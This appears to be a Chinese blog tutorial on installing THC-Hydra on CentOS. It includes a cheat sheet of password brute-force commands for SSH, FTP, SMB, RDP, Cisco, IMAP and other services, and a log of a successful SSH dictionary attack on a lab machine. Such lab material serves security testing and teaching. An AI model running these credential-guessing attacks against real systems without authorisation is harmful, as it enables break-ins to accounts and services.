centos hydra 搭建

shuijingping

　　THC-HYDRA是一个支持多种网络服务的非常快速的网络登陆破解工具。这个工具是一个验证性质的工具，它被设计的主要目的是为研究人员和安全从业人员展示远程获取一个系统的认证权限是比较容易的
　　实验环境
　　centos6.5x64
　　
　　实验安装
　　hydra-7.3.tar.gz
　　

　　软件安装
　　yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel
　　tar zxvf hydra-7.3.tar.gz
　　cd hydra-7.3
　　./configure
　　make
　　make install
　　

　　

　　hydra -version
　　Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
　　

　　
　　touch users.txt
　　less users.txt
　　root
　　admin
　　administrator
　　test
　　

　　touch password.txt
　　less password.txt
　　1
　　123
　　123.com
　　aabbcc
　　systemadmin
　　

　　使用说明
　　hydra  -R 继续从上一次进度接着破解。
       -S 采用SSL链接。
       -s PORT 可通过这个参数指定非默认端口。
       -l LOGIN 指定破解的用户，对特定用户破解。
       -L FILE 指定用户名字典。
       -p PASS 小写，指定密码破解，少用，一般是采用密码字典。
       -P FILE 大写，指定密码字典。
       -e ns 可选选项，n：空密码试探，s：使用指定用户和密码试探。
       -C FILE 使用冒号分割格式，例如“登录名:密码”来代替-L/-P参数。-M FILE 指定目标列表文件一行一条。
       -o FILE 指定结果输出文件。
       -f 在使用-M参数以后，找到第一对登录名或者密码的时候中止破解。
       -t TASKS 同时运行的线程数，默认为16。
       -w TIME 设置最大超时的时间，单位秒，默认是30s。
       -v / -V 显示详细过程
　　破解ssh        hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.160 ssh
　　
　　破解ftp        hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
　　               hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
　　破解https      hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
　　破解teamspeak  hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
　　破解cisco      hydra -P pass.txt 10.36.16.18 cisco
　　               hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
　　破解smb        hydra -l administrator -P pass.txt 10.36.16.18 smb
　　破解pop3       hydra -l muts -P pass.txt my.pop3.mail pop3
　　破解rdp        hydra ip rdp -l administrator -P pass.txt -V
　　破解http-proxy hydra -l admin -P pass.txt http-proxy://10.36.16.18
　　破解imap       hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
　　               hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
　　破解telnet     hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V
　　         
　　hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.160 ssh
　　Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
　　Hydra (http://www.thc.org/thc-hydra) starting at 2016-04-12 17:30:48

[DATA] 1 task, 1 server, 35 login tries (l:5/p:7), ~35 tries per task

[DATA] attacking service ssh on port 22

[VERBOSE] Resolving addresses ... done

[ATTEMPT] target 192.168.1.160 - login "root" - pass "root" - 1 of 35 [child 0]

[ATTEMPT] target 192.168.1.160 - login "root" - pass "" - 2 of 35 [child 0]

[ATTEMPT] target 192.168.1.160 - login "root" - pass "1" - 3 of 35 [child 0]

　　[22][ssh] host: 192.168.1.160   login: root   password: 1  密码破解成功

[ATTEMPT] target 192.168.1.160 - login "admin" - pass "admin" - 8 of 35 [child 0]

[ATTEMPT] target 192.168.1.160 - login "admin" - pass "" - 9 of 35 [child 0]

[ATTEMPT] target 192.168.1.160 - login "admin" - pass "1" - 10 of 35 [child 0]

[ATTEMPT] target 192.168.1.160 - login "admin" - pass "123" - 11 of 35 [child 0]

[ATTEMPT] target 192.168.1.160 - login "admin" - pass "123.com" - 12 of 35 [child 0]

[ATTEMPT] target 192.168.1.160 - login "admin" - pass "aabbcc" - 13 of 35 [child 0]